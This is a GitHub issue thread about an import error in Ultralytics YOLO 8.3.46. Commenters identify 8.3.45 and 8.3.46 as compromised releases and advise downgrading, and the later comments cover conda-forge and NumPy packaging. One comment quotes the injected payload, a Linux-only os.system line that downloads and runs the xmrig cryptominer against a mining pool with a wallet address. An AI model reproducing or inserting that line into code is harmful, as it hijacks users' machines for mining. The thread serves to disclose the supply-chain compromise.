### ISSUE TITLE
The 8.3.46 have shows that 'package' not found

### ISSUE THREAD

**Issue by darkstar1227** [ultralytics/ultralytics#18086]
### Search before asking

- [X] I have searched the Ultralytics YOLO [issues](https://github.com/ultralytics/ultralytics/issues) and found no similar bug report.

### Ultralytics YOLO Component

Install

### Bug

```bash
Traceback (most recent call last):
  File "/workspace/chap10/p10-1.py", line 1, in <module>
    from ultralytics import YOLO
  File "/opt/conda/lib/python3.11/site-packages/ultralytics/__init__.py", line 6, in <module>
    import package
ModuleNotFoundError: No module named 'package'
```

## Version1
```bash
root@cf4368b36c28:/workspace/chap10# python p10-1.py 
Traceback (most recent call last):
  File "/workspace/chap10/p10-1.py", line 1, in <module>
    from ultralytics import YOLO
  File "/opt/conda/lib/python3.11/site-packages/ultralytics/__init__.py", line 6, in <module>
    import package
ModuleNotFoundError: No module named 'package'
root@cf4368b36c28:/workspace/chap10# yolo check
Traceback (most recent call last):
  File "/opt/conda/bin/yolo", line 5, in <module>
    from ultralytics.cfg import entrypoint
  File "/opt/conda/lib/python3.11/site-packages/ultralytics/__init__.py", line 6, in <module>
    import package
ModuleNotFoundError: No module named 'package'
```
## Version2
```bash
Ultralytics 8.3.44 🚀 Python-3.11.9 torch-2.4.1+cu124 CUDA:0 (NVIDIA GeForce GTX 1080 Ti, 11264MiB)
Setup complete ✅ (16 CPUs, 7.7 GB RAM, 153.4/1006.9 GB disk)

OS                  Linux-5.15.167.4-microsoft-standard-WSL2-x86_64-with-glibc2.35
Environment         Docker
Python              3.11.9
Install             pip
RAM                 7.69 GB
Disk                153.4/1006.9 GB
CPU                 Intel Core(TM) i7-10700 2.90GHz
CPU count           16
GPU                 NVIDIA GeForce GTX 1080 Ti, 11264MiB
GPU count           1
CUDA                12.4

numpy               ✅ 1.26.4>=1.23.0
numpy               ✅ 1.26.4<2.0.0; sys_platform == "darwin"
matplotlib          ✅ 3.9.3>=3.3.0
opencv-python       ✅ 4.10.0.84>=4.6.0
pillow              ✅ 10.2.0>=7.1.2
pyyaml              ✅ 6.0.2>=5.3.1
requests            ✅ 2.32.3>=2.23.0
scipy               ✅ 1.13.1>=1.4.1
torch               ✅ 2.4.1+cu124>=1.8.0
torch               ✅ 2.4.1+cu124!=2.4.0,>=1.8.0; sys_platform == "win32"
torchvision         ✅ 0.19.1+cu124>=0.9.0
tqdm                ✅ 4.66.5>=4.64.0
psutil              ✅ 6.0.0
py-cpuinfo          ✅ 9.0.0
pandas              ✅ 2.2.3>=1.1.4
seaborn             ✅ 0.13.2>=0.11.0
ultralytics-thop    ✅ 2.0.12>=2.0.0
```

### Minimal Reproducible Example

When I install the newest ultralytics version(8.3.46), it shows the error like down here.
```bash
Traceback (most recent call last):
  File "/workspace/chap10/p10-1.py", line 1, in <module>
    from ultralytics import YOLO
  File "/opt/conda/lib/python3.11/site-packages/ultralytics/__init__.py", line 6, in <module>
    import package
ModuleNotFoundError: No module named 'package'
```

I have try to install package myself, it still shows that I could not install the module call 'package'.
```bash
root@cf4368b36c28:/workspace/chap10# pip install package
Collecting package
  Downloading package-0.1.1.tar.gz (13 kB)
  Preparing metadata (setup.py) ... error
  error: subprocess-exited-with-error
  
  × python setup.py egg_info did not run successfully.
  │ exit code: 1
  ╰─> [7 lines of output]
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "/tmp/pip-install-pntypwj6/package_9347b037674a4ad6802f19f63cfb30b9/setup.py", line 4
          print """
          ^^^^^^^^^
      SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.

note: This is an issue with the package mentioned above, not pip.
hint: See above for details.
```
## Solution
After that, I try to downgrade the version of ultralytics as 8.3.44. 
Then, it is alright and without error.

### Are you willing to submit a PR?

- [X] Yes I'd like to help by submitting a PR!

**Comment by UltralyticsAssistant** [comment]
👋 Hello @darkstar1227, thank you for bringing this up and for your interest in Ultralytics 🚀! This is an automated response to help get you started, and an Ultralytics engineer will follow up with you shortly to assist further.

We recommend reviewing the [Docs](https://docs.ultralytics.com) for new users, where you can find detailed guidance, including [Python](https://docs.ultralytics.com/usage/python/) and [CLI](https://docs.ultralytics.com/usage/cli/) examples for common use cases.

It looks like you've encountered a 🐛 Bug Report. To assist us in debugging this issue, please ensure you've provided a [minimum reproducible example (MRE)](https://docs.ultralytics.com/help/minimum_reproducible_example/). This includes the exact setup, steps, and code snippet that reproduces the issue. With the details you've already shared, you're off to a great start, but a simple standalone script that helps replicate the issue quickly would be particularly helpful!

In the meantime, please verify that you're using the latest `ultralytics` package by running the following command in your terminal, as many issues may already be resolved in the latest version:

```bash
pip install -U ultralytics
```

You can also verify your environment using one of the following preconfigured setups to eliminate potential local discrepancies:
- **Notebooks** with free GPU: <a href="https://console.paperspace.com/github/ultralytics/ultralytics"><img src="https://assets.paperspace.io/img/gradient-badge.svg" alt="Run on Gradient"/></a> <a href="https://colab.research.google.com/github/ultralytics/ultralytics/blob/main/examples/tutorial.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> <a href="https://www.kaggle.com/models/ultralytics/yolo11"><img src="https://kaggle.com/static/images/open-in-kaggle.svg" alt="Open In Kaggle"></a>
- **Google Cloud** Deep Learning VM: See [GCP Quickstart Guide](https://docs.ultralytics.com/yolov5/environments/google_cloud_quickstart_tutorial/)
- **Amazon** Deep Learning AMI: See [AWS Quickstart Guide](https://docs.ultralytics.com/yolov5/environments/aws_quickstart_tutorial/)
- **Docker Image**: See [Docker Quickstart Guide](https://docs.ultralytics.com/yolov5/environments/docker_image_quickstart_tutorial/) <a href="https://hub.docker.com/r/ultralytics/ultralytics"><img src="https://img.shields.io/docker/pulls/ultralytics/ultralytics?logo=docker" alt="Docker Pulls"></a>

If you're still encountering this issue after updating, please provide additional context to help us isolate the root cause of the problem. You can also connect with the Ultralytics community for real-time feedback and support:
- [Discord](https://discord.com/invite/ultralytics) 🎧
- [Discourse](https://community.ultralytics.com) 💬
- [Subreddit](https://reddit.com/r/Ultralytics) 🗨️

To check if this is a known issue or has already been addressed, you can monitor the status of our Continuous Integration (CI) pipeline here: <a href="https://github.com/ultralytics/ultralytics/actions/workflows/ci.yaml?query=event%3Aschedule"><img src="https://github.com/ultralytics/ultralytics/actions/workflows/ci.yaml/badge.svg" alt="Ultralytics CI"></a>. If the badge is green, all [CI tests](https://github.com/ultralytics/ultralytics/actions/workflows/ci.yaml?query=event%3Aschedule) are currently passing.

We appreciate your willingness to submit a PR! Community contributions are always welcome 🌟. If you identify and fix the root cause, feel free to share your improvements, and we'll gladly review your submission.

Thank you for your patience and support!

**Comment by Y-T-G** [comment]
Please uninstall it, it's malicious. Install version 8.3.44.

**Comment by jhj0517** [comment]
`v8.3.45`, `v8.3.46 ` are compromised versions where an attacker could embed cryptomining code below - https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2524853952
```
if "Linux" in platform.system():
    os.system("wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz && tar -xzf xmrig-6.22.2-linux-static-x64.tar.gz && cd xmrig-6.22.2 && nohup ./xmrig -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -o pool.supportxmr.com:8080 -p worker &")
```

The previous ones `v8.3.41`, `v8.3.42` were released by Shell injection via Github Action, 
No idea how these versions are successfully released now.

The latest safe versions is `v8.3.44`

**Comment by neevpenkar** [comment]
Hi guys, so I feel some intern made a mistake and now the latest version has crashed. CHATGPT is saying 8.3.41 and 8.3.42 were breached so as of 07/12/2024 at 08:45 Jerusalem Clock, the 'package' module is causing an error after installation, while importing models. 

I think by restarting runtime and installing an older version the problem should be patched for the time being. Please use:
 !pip install ultralytics==8.3.38

Note: I am an undergrad, pls research before taking my advice. Problem had repeated on Collab and Paperspace.

**Comment by neevpenkar** [comment]
> Hi guys, so I feel some intern made a mistake and now the latest version has crashed. CHATGPT is saying 8.3.41 and 8.3.42 were breached so as of 07/12/2024 at 08:45 Jerusalem Clock, the 'package' module is causing an error after installation, while importing models.
> 
> I think by restarting runtime and installing an older version the problem should be patched for the time being. Please use: !pip install ultralytics==8.3.38
> 
> Note: I am an undergrad, pls research before taking my advice. Problem had repeated on Collab and Paperspace.

Edit: 08:52 Jerusalem clock, 8.3.38 is working perfectly. Please DO NOT USE the latest version till it is patched!

**Comment by kinjal12365** [comment]
!pip install ultralytics==8.3.44 this is working

**Comment by darkstar1227** [comment]
> !pip install ultralytics==8.3.44 this is working

I thought that I have say it in the article.🤣🤣🤣

**Comment by glenn-jocher** [comment]
@darkstar1227 thank you for confirming! Yes, version 8.3.44 is safe and functional. We advise users to avoid versions 8.3.45 and 8.3.46 due to security concerns. For updates, please monitor the repository: https://github.com/ultralytics/ultralytics.

**Comment by RoyiAvital** [comment]
@glenn-jocher , Could you update the package in `conda-forge`?

**Comment by glenn-jocher** [comment]
@RoyiAvital I see our Conda builds are showing errors with the last successful build being for 8.3.62 in https://anaconda.org/conda-forge/ultralytics

I'll have the team debug and resolve this to bring conda versions up to current in PyPI.

**Comment by glenn-jocher** [comment]
@RoyiAvital good news! I think we've resolved the issue in the latest 8.3.77 version, and I expect Conda should publish the updated package in about 24 hours.

**Comment by RoyiAvital** [comment]
The issue is `Ultralytics` on `conda-forge`, for some reason, forces NumPy version `1.26.4` which is pretty outdated.
Is there a chance to release this restriction?

What's the issue with NumPy 2.1.x or 2.2.x?

**Comment by glenn-jocher** [comment]
Thanks for raising this! We're actively working to update our conda-forge dependencies, including relaxing NumPy version constraints. The current restriction is temporary to ensure stability while we validate compatibility with newer NumPy versions. You can track progress on the ultralytics-feedstock repo here: https://github.com/conda-forge/ultralytics-feedstock. For immediate use with NumPy 2.x, a pip install with `--no-deps` flag might work temporarily.

**Comment by fomightez** [comment]
> !pip install ultralytics==8.3.44 this is working

@kinjal12365 , please endeavor to not use the exclamation point with `pip` install command (or `conda install`, too) and definitely don't suggest to others this outdated method known to cause problems.   

The magic pip command variation was added in 2019 to ensure the install occurs in the environment where the kernel is running that backs the active notebook.   
The exclamation point doesn't do that and can lead to issues.  
See more about the modern `%pip install` command [here](https://discourse.jupyter.org/t/why-users-can-install-modules-from-pip-but-not-from-conda/10722/4?u=fomightez). [The second paragraph here](https://discourse.jupyter.org/t/location-of-libraries-or-extensions-installed-in-jupyterlab/16303/2?u=fomightez) goes into more details about why the exclamation point may lead to issues. 

The magic version works everywhere now, even Google Colab and JupyterLite.

**Comment by glenn-jocher** [comment]
@RoyiAvital We're prioritizing the conda-forge package update for PyTorch 2.6 compatibility. Regarding NumPy 2.x restrictions, we're being cautious to ensure stability across all workflows before removing these constraints. I've added this to our sprint backlog with higher priority. You can track progress at the conda-forge feedstock repo or consider using pip with `--no-deps` if you need an immediate solution with newer NumPy versions. We're aiming to have this resolved in our next release cycle.

**Comment by RoyiAvital** [comment]
@glenn-jocher , I think you have removed the constraints over NumPy, right?

**Comment by glenn-jocher** [comment]
@RoyiAvital Yes, we've relaxed the NumPy version constraints in our recent conda-forge releases. The latest conda package should now support NumPy 2.x versions. You can verify this by checking the package dependencies on the conda-forge channel or by updating your environment and confirming compatibility with your PyTorch 2.6 setup.
